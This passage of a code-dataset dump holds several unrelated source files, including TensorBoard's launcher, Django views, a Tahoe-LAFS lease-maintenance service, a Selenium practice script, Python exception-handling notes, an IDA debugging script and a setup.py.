--logdir=name1:/path/to/logs/1,name2:/path/to/logs/2\n\"\"\")\n\nflags.DEFINE_string('host', '0.0.0.0', 'What host to listen to. Defaults to '\n 'serving on 0.0.0.0, set to 127.0.0.1 (localhost) to'\n 'disable remote access (also quiets security warnings).')\n\nflags.DEFINE_integer('port', 6006, 'What port to serve TensorBoard on.')\n\nflags.DEFINE_boolean('purge_orphaned_data', True, 'Whether to purge data that '\n 'may have been orphaned due to TensorBoard restarts. '\n 'Disabling purge_orphaned_data can be used to debug data '\n 'disappearance.')\n\nflags.DEFINE_integer('reload_interval', 5, 'How often the backend should load '\n 'more data.')\n\n# Inspect Mode flags\n\nflags.DEFINE_boolean('inspect', False, \"\"\"Use this flag to print out a digest\nof your event files to the command line, when no data is shown on TensorBoard or\nthe data shown looks weird.\n\nExample usages:\ntensorboard --inspect --event_file=myevents.out\ntensorboard --inspect --event_file=myevents.out --tag=loss\ntensorboard --inspect --logdir=mylogdir\ntensorboard --inspect --logdir=mylogdir --tag=loss\n\nSee tensorflow/python/summary/event_file_inspector.py for more info and\ndetailed usage.\n\"\"\")\nflags.DEFINE_string(\n 'tag', '',\n 'The particular tag to query for. Only used if --inspect is present')\nflags.DEFINE_string(\n 'event_file', '',\n 'The particular event file to query for. Only used if --inspect is present '\n 'and --logdir is not specified.')\n\nFLAGS = flags.FLAGS\n\n\ndef create_tb_app():\n \"\"\"Read the flags, and create a TensorBoard WSGI application.\"\"\"\n if not FLAGS.logdir:\n raise ValueError('A logdir must be specified. Run `tensorboard --help` for '\n 'details and examples.')\n\n logdir = os.path.expanduser(FLAGS.logdir)\n return application.standard_tensorboard_wsgi(\n logdir=logdir,\n purge_orphaned_data=FLAGS.purge_orphaned_data,\n reload_interval=FLAGS.reload_interval)\n\n\ndef run_simple_server(tb_app):\n \"\"\"Start serving TensorBoard, and print some messages to console.\"\"\"\n # Mute the werkzeug logging.\n base_logging.getLogger('werkzeug').setLevel(base_logging.WARNING)\n\n try:\n server = serving.make_server(FLAGS.host, FLAGS.port, tb_app, threaded=True)\n server.daemon_threads = True\n except socket.error:\n if FLAGS.port == 0:\n msg = 'TensorBoard unable to find any open port'\n else:\n msg = (\n 'TensorBoard attempted to bind to port %d, but it was already in use'\n % FLAGS.port)\n logging.error(msg)\n print(msg)\n exit(-1)\n\n port = server.socket.getsockname()[1]\n msg = 'Starting TensorBoard %s at http://%s:%d' % (tb_app.tag, FLAGS.host,\n port)\n print(msg)\n logging.info(msg)\n print('(Press CTRL+C to quit)')\n sys.stdout.flush()\n\n server.serve_forever()\n\n\ndef main(unused_argv=None):\n if FLAGS.inspect:\n logging.info('Not bringing up TensorBoard, but inspecting event files.')\n event_file = os.path.expanduser(FLAGS.event_file)\n efi.inspect(FLAGS.logdir, event_file, FLAGS.tag)\n return 0\n else:\n tb = create_tb_app()\n run_simple_server(tb)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"tensorflow-master/tensorflow/tensorboard/tensorboard.py","file_name":"tensorboard.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"373326383","text":"import logging\n\n\nclass TaskAction(object):\n \"\"\"The ABC of all actions\"\"\"\n\n def __init__(self, config, server = None, resturl = None):\n self.logger = logging.getLogger(type(self).__name__)\n self.config = config\n self.jobtypeMapper = { \"Analysis\" : \"Processing\",\n \"PrivateMC\" : \"Production\",\n \"Generic\" : \"Generic\",}\n self.server = server\n self.resturl = resturl\n if server: #when testing this can be none\n self.backendurls = self.server.get(self.resturl.replace('workflowdb', 'info'), data={'subresource':'backendurls'})[0]['result'][0]\n\n def execute(self):\n raise NotImplementedError\n\n","sub_path":"src/python/TaskWorker/Actions/TaskAction.py","file_name":"TaskAction.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440241145","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom pyartcd.locks import LockManager, LOCK_POLICY, Lock\n\n\nclass TestLocks(TestCase):\n def test_lock_policy(self):\n lock: Lock = Lock.GITHUB_ACTIVITY\n lock_policy: dict = LOCK_POLICY[lock]\n self.assertEqual(lock_policy['retry_count'], 36000)\n self.assertEqual(lock_policy['retry_delay_min'], 0.1)\n self.assertEqual(lock_policy['lock_timeout'], 60 * 60 * 6)\n\n def test_lock_name(self):\n lock: Lock = Lock.GITHUB_ACTIVITY\n lock_name = lock.value.format(version='4.14')\n self.assertEqual(lock_name, 'github-activity-lock-4.14')\n\n @patch(\"pyartcd.redis.redis_url\", return_value='fake_url')\n @patch(\"aioredlock.algorithm.Aioredlock.__attrs_post_init__\")\n def test_lock_manager(self, *_):\n lock: Lock = Lock.COMPOSE\n lm = LockManager.from_lock(lock)\n self.assertEqual(lm.retry_count, LOCK_POLICY[Lock.COMPOSE]['retry_count'])\n self.assertEqual(lm.retry_delay_min, LOCK_POLICY[Lock.COMPOSE]['retry_delay_min'])\n self.assertEqual(lm.internal_lock_timeout, LOCK_POLICY[Lock.COMPOSE]['lock_timeout'])\n self.assertEqual(lm.redis_connections, ['fake_url'])\n","sub_path":"pyartcd/tests/test_locks.py","file_name":"test_locks.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"406886463","text":"import regex as re\nimport ast\nfrom django.shortcuts import render\nfrom save.models import Product_subs\nfrom research.forms import SearchForm\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.contrib.auth.decorators import login_required\n\n\n# variables initialization.\n\nform = SearchForm()\nsave = []\n\n# save substitut of product views\n@login_required(login_url='/index/')\ndef save_prod(request):\n # take a user id\n current_user = request.user\n if request.method == \"POST\":\n\n query = request.POST['subs_0']\n query = query.split(\"+\")\n # insert product in database\n Product_subs.objects.update_or_create(name_product=query[1],\n name_product_subs=query[0],\n image_product_subs=query[3],\n prod_sub_nut=query[4],\n nut_100=query[5],\n cuurent_user=current_user.id,\n url_subs=query[6],\n nut_levels=query[7],\n image_product=query[2])\n # take product save by user\n save = list(Product_subs.objects.filter(cuurent_user=current_user.id).values())\n # Slice pages\n paginator = Paginator(save, 2)\n # Get current page number\n page = request.GET.get('page')\n try:\n # Return only this page albums and not others\n save = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n save = paginator.page(1)\n except EmptyPage:\n save = paginator.page(paginator.num_pages)\n\n context_1 = {'form':form,'save': save}\n \n \n return render(request,'save/ind_pge_favorite.html',\n context_1)\n \n \nq_lip_fr = ''\nq_lip_1 = ''\nq_sat_fr = ''\nq_sat_1 = ''\nq_sugar_fr = ''\nq_sugar_1 = ''\nq_sodium_fr = ''\nq_sodium_1 = ''\ncontext = {}\n\n# views for aliment feature\n@login_required(login_url='/index/')\ndef aliment(request):\n\n if request.method == \"POST\":\n query_1 = request.POST['subs_1']\n query_1 = query_1.split('+')\n\n a = ast.literal_eval(query_1[1])\n a_1 = ast.literal_eval(query_1[4])\n query_lip = a['fat_100g']\n \n q_lip_fr = a_1['fat']\n if q_lip_fr == 'low':\n q_lip_1 = 'en faible quantité'\n elif q_lip_fr == 'moderate':\n q_lip_1 = 'en quantité moyenne'\n elif q_lip_fr == 'high':\n q_lip_1 = 'en quantité élevée'\n \n query_sat = a['saturated-fat_100g']\n q_sat_fr = a_1['saturated-fat']\n if q_sat_fr == 'low':\n q_sat_1 = 'en faible quantité'\n elif q_sat_fr == 'moderate':\n q_sat_1 = 'en quantité moyenne'\n elif q_sat_fr == 'high':\n q_sat_1 = 'en quantité élevée'\n \n query_sugar = a['sugars_100g']\n q_sugar_fr = a_1['sugars']\n if q_sugar_fr == 'low':\n q_sugar_1 = 'en faible quantité'\n elif q_sugar_fr == 'moderate':\n q_sugar_1 = 'en quantité moyenne'\n elif q_sugar_fr == 'high':\n q_sugar_1 = 'en quantité élevée'\n \n query_sodium = a['salt']\n q_sodium_fr = a_1['salt']\n if q_sodium_fr == 'low':\n q_sodium_1 = 'en faible quantité'\n elif q_sodium_fr == 'moderate':\n q_sodium_1 = 'en quantité moyenne'\n elif q_sodium_fr == 'high':\n q_sodium_1 = 'en quantité élevée'\n context = {\"nut\": query_1[0], \"sub_url\": query_1[2],\n \"lip_0\": query_lip, \"lip\": q_lip_fr,\n \"lip_1\": q_lip_1, \"sat_0\": query_sat,\n \"sat\": q_sat_fr, \"sat_1\": q_sat_1,\n \"sugar_0\": query_sugar, \"sugar\": q_sugar_fr,\n \"sugar_1\": q_sugar_1, \"sodium_0\": query_sodium,\n \"sodium\": q_sodium_fr, \"sodium_1\":q_sodium_1,\n \"product\": query_1[3], \"image\":query_1[5], \"form\":form}\n return render(request,'save/ind_pge_aliment.html',\n context)\n\n\n\n \n\n","sub_path":"save/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321544454","text":"# Copyright 2019 PrivateStorage.io, LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis module implements a service which periodically spends ZKAPs to\nrefresh leases on all shares reachable from a root.\n\"\"\"\n\nfrom functools import (\n partial,\n)\nfrom datetime import (\n datetime,\n timedelta,\n)\nfrom errno import (\n ENOENT,\n)\nimport attr\n\nfrom zope.interface import (\n implementer,\n)\n\nfrom aniso8601 import (\n parse_datetime,\n)\n\nfrom twisted.internet.defer import (\n inlineCallbacks,\n maybeDeferred,\n)\nfrom twisted.application.service import (\n Service,\n)\nfrom twisted.python.log import (\n err,\n)\n\nfrom allmydata.interfaces import (\n IDirectoryNode,\n IFilesystemNode,\n)\nfrom allmydata.util.hashutil import (\n file_renewal_secret_hash,\n bucket_renewal_secret_hash,\n)\n\nfrom .controller import (\n bracket,\n)\n\nfrom .model import (\n ILeaseMaintenanceObserver,\n)\n\nSERVICE_NAME = u\"lease maintenance service\"\n\n\n@inlineCallbacks\ndef visit_storage_indexes(root_nodes, visit):\n \"\"\"\n Call a visitor with the storage index of ``root_node`` and that of all\n nodes reachable from it.\n\n :param IFilesystemNode root_node: The node from which to start.\n\n :param visit: A one-argument callable. It will be called with the storage\n index of all visited nodes.\n\n :return Deferred: A Deferred which fires after all nodes have been\n visited.\n \"\"\"\n if not isinstance(root_nodes, list):\n raise TypeError(\"root_nodes must be a list, not {!r}\".format(\n root_nodes,\n ))\n for node in root_nodes:\n if not IFilesystemNode.providedBy(node):\n raise TypeError(\"Root nodes must provide IFilesystemNode, {!r} does not\".format(\n node,\n ))\n\n stack = root_nodes[:]\n while stack:\n elem = stack.pop()\n visit(elem.get_storage_index())\n if IDirectoryNode.providedBy(elem):\n children = yield elem.list()\n # Produce consistent results by forcing some consistent ordering\n # here. This will sort by name.\n stable_children = sorted(children.items())\n for (name, (child_node, child_metadata)) in stable_children:\n stack.append(child_node)\n\n\ndef iter_storage_indexes(visit_assets):\n \"\"\"\n Get an iterator over storage indexes of all nodes visited by\n ``visit_assets``.\n\n :param visit_assets: A one-argument function which takes a visit function\n and calls it with all nodes to visit.\n\n :return Deferred[list[bytes]]: A Deferred that fires with a list of\n storage indexes from the visited nodes. The list is in an arbitrary\n order and does not include duplicates if any nodes were visited more\n than once.\n \"\"\"\n storage_indexes = set()\n visit = storage_indexes.add\n d = visit_assets(visit)\n # Create some order now that we've ensured they're unique.\n d.addCallback(lambda ignored: list(storage_indexes))\n return d\n\n\n@inlineCallbacks\ndef renew_leases(\n visit_assets,\n storage_broker,\n secret_holder,\n min_lease_remaining,\n get_activity_observer,\n now,\n):\n \"\"\"\n Check the leases on a group of nodes for those which are expired or close\n to expiring and renew such leases.\n\n :param visit_assets: A one-argument callable which takes a visitor\n function and calls it with the storage index of every node to check.\n\n :param StorageFarmBroker storage_broker: A storage broker which can supply\n the storage servers where the nodes should be checked.\n\n :param SecretHolder secret_holder: The source of the renew secret for any\n leases which require renewal.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param get_activity_observer: A no-argument callable which returns an\n ``ILeaseMaintenanceObserver``.\n\n :param now: A no-argument function returning the current time, as a\n datetime instance, for comparison against lease expiration time.\n\n :return Deferred: A Deferred which fires when all visitable nodes have\n been checked and any leases renewed which required it.\n \"\"\"\n activity = get_activity_observer()\n\n storage_indexes = yield iter_storage_indexes(visit_assets)\n\n renewal_secret = secret_holder.get_renewal_secret()\n servers = list(\n server.get_storage_server()\n for server\n in storage_broker.get_connected_servers()\n )\n\n for server in servers:\n # Consider parallelizing this.\n yield renew_leases_on_server(\n min_lease_remaining,\n renewal_secret,\n storage_indexes,\n server,\n activity,\n now(),\n )\n\n activity.finish()\n\n\n@inlineCallbacks\ndef renew_leases_on_server(\n min_lease_remaining,\n renewal_secret,\n storage_indexes,\n server,\n activity,\n now,\n):\n \"\"\"\n Check leases on the shares for the given storage indexes on the given\n storage server for those which are expired or close to expiring and renew\n such leases.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param renewal_secret: A seed for the renewal secret hash calculation for\n any leases which need to be renewed.\n\n :param list[bytes] storage_indexes: The storage indexes to check.\n\n :param StorageServer server: The storage server on which to check.\n\n :param ILeaseMaintenanceObserver activity: An object which will receive\n events allowing it to observe the lease maintenance activity.\n\n :param datetime now: The current time for comparison against the least\n expiration time.\n\n :return Deferred: A Deferred which fires after all storage indexes have\n been checked and any leases that need renewal have been renewed.\n \"\"\"\n stats = yield server.stat_shares(storage_indexes)\n for storage_index, stat_dict in zip(storage_indexes, stats):\n if not stat_dict:\n # The server has no shares for this storage index.\n continue\n\n # Keep track of what's been seen.\n activity.observe([stat.size for stat in stat_dict.values()])\n\n # All shares have the same lease information.\n stat = stat_dict.popitem()[1]\n if needs_lease_renew(min_lease_remaining, stat, now):\n yield renew_lease(renewal_secret, storage_index, server)\n\n\ndef renew_lease(renewal_secret, storage_index, server):\n \"\"\"\n Renew the lease on the shares in one storage index on one server.\n\n :param renewal_secret: A seed for the renewal secret hash calculation for\n any leases which need to be renewed.\n\n :param bytes storage_index: The storage index to operate on.\n\n :param StorageServer server: The storage server to operate on.\n\n :return Deferred: A Deferred that fires when the lease has been renewed.\n \"\"\"\n # See allmydata/immutable/checker.py, _get_renewal_secret\n renew_secret = bucket_renewal_secret_hash(\n file_renewal_secret_hash(\n renewal_secret,\n storage_index,\n ),\n server.get_lease_seed(),\n )\n return server.renew_lease(\n storage_index,\n renew_secret,\n )\n\n\ndef needs_lease_renew(min_lease_remaining, stat, now):\n \"\"\"\n Determine if a lease needs renewal.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param ShareStat stat: The metadata about a share to consider.\n\n :param datetime now: The current time for comparison against the lease\n expiration time.\n\n :return bool: ``True`` if the lease needs to be renewed, ``False``\n otherwise.\n \"\"\"\n remaining = datetime.utcfromtimestamp(stat.lease_expiration) - now\n return remaining < min_lease_remaining\n\n\n@attr.s\nclass _FuzzyTimerService(Service):\n \"\"\"\n A service to periodically, but not *too* periodically, run an operation.\n\n :ivar operation: A no-argument callable to fuzzy-periodically run. It may\n return a Deferred in which case the next run will not be scheduled\n until the Deferred fires.\n\n :ivar timedelta initial_interval: The amount of time to wait before the first\n run of the operation.\n\n :ivar sample_interval_distribution: A no-argument callable which returns a\n number of seconds as a float giving the amount of time to wait before\n the next run of the operation. It will be called each time the\n operation completes.\n\n :ivar IReactorTime reactor: A Twisted reactor to use to schedule runs of\n the operation.\n \"\"\"\n name = attr.ib()\n operation = attr.ib()\n initial_interval = attr.ib()\n sample_interval_distribution = attr.ib()\n reactor = attr.ib()\n\n def startService(self):\n Service.startService(self)\n self._call = self.reactor.callLater(\n self.initial_interval.total_seconds(),\n self._iterate,\n )\n\n def stopService(self):\n self._call.cancel()\n self._call = None\n return Service.stopService(self)\n\n def _iterate(self):\n \"\"\"\n Run the operation once and then schedule it to run again.\n \"\"\"\n d = maybeDeferred(self.operation)\n d.addErrback(err, \"Fuzzy timer service ({})\".format(self.name))\n d.addCallback(lambda ignored: self._schedule())\n\n def _schedule(self):\n \"\"\"\n Schedule the next run of the operation.\n \"\"\"\n self._call = self.reactor.callLater(\n self.sample_interval_distribution().total_seconds(),\n self._iterate,\n )\n\n\ndef lease_maintenance_service(\n maintain_leases,\n reactor,\n last_run_path,\n random,\n interval_mean=None,\n interval_range=None,\n):\n \"\"\"\n Get an ``IService`` which will maintain leases on ``root_node`` and any\n nodes directly or transitively reachable from it.\n\n :param IReactorClock reactor: A Twisted reactor for scheduling renewal\n activity.\n\n :param FilePath last_run_path: A path containing the time (as an ISO8601\n datetime string) at which lease maintenance last ran to inform an\n adjustment to the first interval before running it again. If no file\n exists at the path it is treated as though there has been no previous\n run. The path will also be rewritten on each run to update this\n value.\n\n :param random: An object like ``random.Random`` which can be used as a\n source of scheduling delay.\n\n :param timedelta interval_mean: The mean time between lease renewal checks.\n\n :param timedelta interval_range: The range of the uniform distribution of\n lease renewal checks (centered on ``interval_mean``).\n\n :param maintain_leases: A no-argument callable which performs a round of\n lease-maintenance. The resulting service calls this periodically.\n \"\"\"\n if interval_mean is None:\n interval_mean = timedelta(days=26)\n if interval_range is None:\n interval_range = timedelta(days=4)\n halfrange = interval_range / 2\n\n def sample_interval_distribution():\n return timedelta(\n seconds=random.uniform(\n (interval_mean - halfrange).total_seconds(),\n (interval_mean + halfrange).total_seconds(),\n ),\n )\n # Rather than an all-or-nothing last-run time we probably eventually want\n # to have a more comprehensive record of the state when we were last\n # interrupted. This would remove the unfortunate behavior of restarting\n # from the beginning if we shut down during a lease scan. Shutting down\n # during a lease scan becomes increasingly likely the more shares there\n # are to check.\n last_run = read_time_from_path(last_run_path)\n if last_run is None:\n initial_interval = sample_interval_distribution()\n else:\n initial_interval = calculate_initial_interval(\n sample_interval_distribution,\n last_run,\n datetime.utcfromtimestamp(reactor.seconds()),\n )\n initial_interval = max(\n initial_interval,\n timedelta(0),\n )\n\n\n return _FuzzyTimerService(\n SERVICE_NAME,\n lambda: bracket(\n lambda: None,\n lambda: write_time_to_path(\n last_run_path,\n datetime.utcfromtimestamp(reactor.seconds()),\n ),\n maintain_leases,\n ),\n initial_interval,\n sample_interval_distribution,\n reactor,\n )\n\n\ndef write_time_to_path(path, when):\n \"\"\"\n Write an ISO8601 datetime string to a file.\n\n :param FilePath path: The path to a file to which to write the datetime\n string.\n\n :param datetime when: The datetime to write.\n \"\"\"\n path.setContent(when.isoformat())\n\n\ndef read_time_from_path(path):\n \"\"\"\n Read an ISO8601 datetime string from a file.\n\n :param FilePath path: The path to a file containing a datetime string.\n\n :return: None if no file exists at the path. Otherwise, a datetime\n instance giving the time represented in the file.\n \"\"\"\n try:\n when = path.getContent()\n except IOError as e:\n if ENOENT == e.errno:\n return None\n raise\n else:\n return parse_datetime(when)\n\n\ndef visit_storage_indexes_from_root(visitor, get_root_nodes):\n \"\"\"\n An operation for ``lease_maintenance_service`` which applies the given\n visitor to ``root_node`` and all its children.\n\n :param visitor: A one-argument callable which takes the traversal function\n and which should call it as desired.\n\n :param get_root_nodes: A no-argument callable which returns a list of\n filesystem nodes (``IFilesystemNode``) at which traversal will begin.\n\n :return: A no-argument callable to perform the visits.\n \"\"\"\n return lambda: visitor(\n partial(\n visit_storage_indexes,\n # Make sure we call get_root_nodes each time to give us a chance\n # to notice when it changes.\n get_root_nodes(),\n ),\n )\n\n\n@implementer(ILeaseMaintenanceObserver)\nclass NoopMaintenanceObserver(object):\n \"\"\"\n A lease maintenance observer that does nothing.\n \"\"\"\n def observe(self, sizes):\n pass\n\n def finish(self):\n pass\n\n\n@implementer(ILeaseMaintenanceObserver)\n@attr.s\nclass MemoryMaintenanceObserver(object):\n \"\"\"\n A lease maintenance observer that records observations in memory.\n \"\"\"\n observed = attr.ib(default=attr.Factory(list))\n finished = attr.ib(default=False)\n\n def observe(self, sizes):\n self.observed.append(sizes)\n\n def finish(self):\n self.finished = True\n\n\ndef maintain_leases_from_root(\n get_root_nodes,\n storage_broker,\n secret_holder,\n min_lease_remaining,\n progress,\n get_now,\n):\n \"\"\"\n An operation for ``lease_maintenance_service`` which visits ``root_node``\n and all its children and renews their leases if they have\n ``min_lease_remaining`` or less on them.\n\n :param get_root_nodes: A no-argument callable which returns the list of\n Tahoe-LAFS filesystem nodes (``IFilesystemNode``) to use as the roots\n of the node hierarchies to be maintained.\n\n :param StorageFarmBroker storage_broker: The storage broker which can put\n us in touch with storage servers where shares of the nodes to maintain\n might be found.\n\n :param SecretHolder secret_holder: The Tahoe-LAFS client node secret\n holder which can give us the lease renewal secrets needed to renew\n leases.\n\n :param timedelta min_lease_remaining: The minimum amount of time remaining\n to allow on a lease without renewing it.\n\n :param get_now: A no-argument callable that returns the current time as a\n ``datetime`` instance.\n\n :return: A no-argument callable to perform the maintenance.\n \"\"\"\n def visitor(visit_assets):\n return renew_leases(\n visit_assets,\n storage_broker,\n secret_holder,\n min_lease_remaining,\n progress,\n get_now,\n )\n\n return visit_storage_indexes_from_root(\n visitor,\n get_root_nodes,\n )\n\n\ndef calculate_initial_interval(sample_interval_distribution, last_run, now):\n \"\"\"\n Determine how long to wait before performing an initial (for this process)\n scan for aging leases.\n\n :param sample_interval_distribution: See ``_FuzzyTimerService``.\n :param datetime last_run: The time of the last scan.\n :param datetime now: The current time.\n \"\"\"\n since_last_run = now - last_run\n initial_interval = sample_interval_distribution() - since_last_run\n return initial_interval\n","sub_path":"src/_zkapauthorizer/lease_maintenance.py","file_name":"lease_maintenance.py","file_ext":"py","file_size_in_byte":17427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643768756","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef reverseList(head: ListNode) -> ListNode:\n '''\n 1 -> 2 -> 3 -> 4 -> 5\n '''\n if head and head.next:\n new_head = reverseList(head.next)\n head.next.next = head\n head.next = None\n return new_head\n else:\n return head","sub_path":"recursion/reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35223571","text":"import time\n\nfrom selenium import webdriver\n#\n# browser = webdriver.Chrome()\n# browser.maximize_window()\n# browser.get(\"http://www.baidu.com\")\n# time.sleep(5)\n# print(browser.page_source)\n# browser.close()\n# browser.quit()\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\n\nbrowser = webdriver.Chrome()\nbrowser.get(\"http://www.taobao.com\")\ninput_first = browser.find_element_by_id(\"J_SiteNavLogin\")\ninput_second = browser.find_element_by_css_selector(\"#q\")\ninput_third = browser.find_element_by_xpath('//*[@id=\"q\"]')\nprint(input_first.text)\nprint(input_second.text)\nprint(input_third.text)\nbrowser.close()\nbrowser.quit()\n\n# 返回 前进\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.baidu.com/')\nbrowser.get('https://www.taobao.com/')\nbrowser.get('https://www.python.org/')\nbrowser.back()\ntime.sleep(1)\nbrowser.forward()\nbrowser.close()\nbrowser.quit()\n\n\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.zhihu.com/explore')\nprint(browser.get_cookies())\nbrowser.add_cookie({'name': 'name', 'domain': 'www.zhihu.com', 'value': 'zhaofan'})\nprint(browser.get_cookies())\nbrowser.delete_all_cookies()\nprint(browser.get_cookies())\n\n\nbrowser = webdriver.Chrome()\nbrowser.get('https://www.baidu.com')\nbrowser.execute_script('window.open()')\nprint(browser.window_handles)\nbrowser.switch_to_window(browser.window_handles[1])\nbrowser.get('https://www.taobao.com')\ntime.sleep(1)\nbrowser.switch_to_window(browser.window_handles[0])\nbrowser.get('https://python.org')\n\nbrowser = webdriver.Chrome()\ntry:\n browser.get('https://www.baidu.com')\nexcept TimeoutException:\n print('Time Out')\ntry:\n browser.find_element_by_id('hello')\nexcept NoSuchElementException:\n print('No Element')\nfinally:\n browser.close()\n\n","sub_path":"pachong/���虫/Study/Selenium/study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"448535805","text":"# 首先,执行try子句(在关键字try和关键字except之间的语句)\n# 如果没有异常发生,忽略except子句,try子句执行后结束。\n# 如果在执行try子句的过程中发生了异常,那么try子句余下的部分将被忽略。\n# 如果异常的类型和 except 之后的名称相符,那么对应的except子句将被执行。最后执行 try 语句之后的代码。\n# 如果一个异常没有与任何的except匹配,那么这个异常将会传递给上层的try中\ntry:\n x = int(input(\"Please enter a number: \"))\n break\nexcept ValueError:\n print(\"Oops! That was no valid number. Try again \")\n\n# 一个 try 语句可能包含多个except子句,分别来处理不同的特定的异常。最多只有一个分支会被执行。\ntry:\n f = open('myfile.txt')\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n# 最后一个except子句可以忽略异常的名称,它将被当作通配符使用。你可以使用这种方法打印一个错误信息,然后再次把异常抛出。\n\n# 一个except子句可以同时处理多个异常,这些异常将被放在一个括号里成为一个元组,\nexcept (RuntimeError, TypeError, NameError):\n pass\n\n# try except 语句还有一个可选的else子句,如果使用这个子句,那么必须放在所有的except子句之后。\n# 这个子句将在try子句没有发生任何异常的时候执行。\nfor arg in sys.argv[1:]:\n try:\n f = open(arg, 'r')\n except IOError:\n print('cannot open', arg)\n else:\n print(arg, 'has', len(f.readlines()), 'lines')\n f.close()\n\n# try 语句还有另外一个可选的子句,它定义了无论在任何情况下都会执行的清理行为。\ntry:\n raise KeyboardInterrupt\nfinally:\n print('Goodbye, world!')\n\n\ndef divide(x, y):\n try:\n result = x / y\n except ZeroDivisionError:\n print(\"division by zero!\")\n else:\n print(\"result is\", result)\n finally:\n print(\"executing finally clause\")\n\n\n# 关键词 with 语句就可以保证诸如文件之类的对象在使用完之后一定会正确的执行他的清理方法:\nwith open(\"myfile.txt\") as f:\n for line in f:\n print(line, end=\"\")\n","sub_path":"python/learn-note/grammar foundation/07_错误和异常.py","file_name":"07_错误和异常.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"584694345","text":"'''\r\nint __cdecl builtin_exec(_object *self, _object *args)\r\n'''\r\nargs_ea = idc.GetRegValue('rdx') if IS_64BIT else get_addr_by_ptr(str2ea('esp + 8'))\r\nif args_ea != idaapi.BADADDR:\r\n\targs = pyTupleObject_to_plist(args_ea)\r\n\tprint >> P_OUT, '#builtin_exec -> args count {}'.format(len(args))\r\n\tif args:\r\n\t\tif get_obj_type(args[0]) in ['PyString', 'PyUnicodeString']:\r\n\t\t\tprint >> P_OUT, pyStringObject_to_string(args[0])\r\n\tprint >> P_OUT, '-' * 50 + '\\n'\r\n\tprint >> P_OUT, call_trace(8)\r\n\treturn True\r\nreturn False","sub_path":"IPH/3.4/break_condition_builtin_exec.py","file_name":"break_condition_builtin_exec.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243812973","text":"#!/usr/bin/env python3\n\"\"\"aioesphomeapi setup script.\"\"\"\nfrom setuptools import find_packages, setup\n\nVERSION = '2.6.1'\nPROJECT_NAME = 'aioesphomeapi'\nPROJECT_PACKAGE_NAME = 'aioesphomeapi'\nPROJECT_LICENSE = 'MIT'\nPROJECT_AUTHOR = 'Otto Winter'\nPROJECT_COPYRIGHT = ' 2019, Otto Winter'\nPROJECT_URL = 'https://esphome.io/'\nPROJECT_EMAIL = 'contact@otto-winter.com'\n\nPROJECT_GITHUB_USERNAME = 'esphome'\nPROJECT_GITHUB_REPOSITORY = 'aioesphomeapi'\n\nPYPI_URL = 'https://pypi.python.org/pypi/{}'.format(PROJECT_PACKAGE_NAME)\nGITHUB_PATH = '{}/{}'.format(PROJECT_GITHUB_USERNAME, PROJECT_GITHUB_REPOSITORY)\nGITHUB_URL = 'https://github.com/{}'.format(GITHUB_PATH)\n\nDOWNLOAD_URL = '{}/archive/{}.zip'.format(GITHUB_URL, VERSION)\n\nREQUIRES = [\n 'attrs',\n # Pin protobuf version to 3.6.1, 3.7 is slightly incompatible with the generated\n # api_pb2.py. We could upgrade to 3.7, but that breaks HA installs because\n # image_processing.tensorflow pins protobuf to 3.6.1\n 'protobuf==3.6.1',\n 'zeroconf>=0.21.3',\n]\n\nsetup(\n name=PROJECT_PACKAGE_NAME,\n version=VERSION,\n url=PROJECT_URL,\n download_url=DOWNLOAD_URL,\n author=PROJECT_AUTHOR,\n author_email=PROJECT_EMAIL,\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=REQUIRES,\n python_requires='>=3.5.3',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394454355","text":"import time\n# Draws a space\ndef Spacing():\n Spaces = [' ' , ' ' , ' 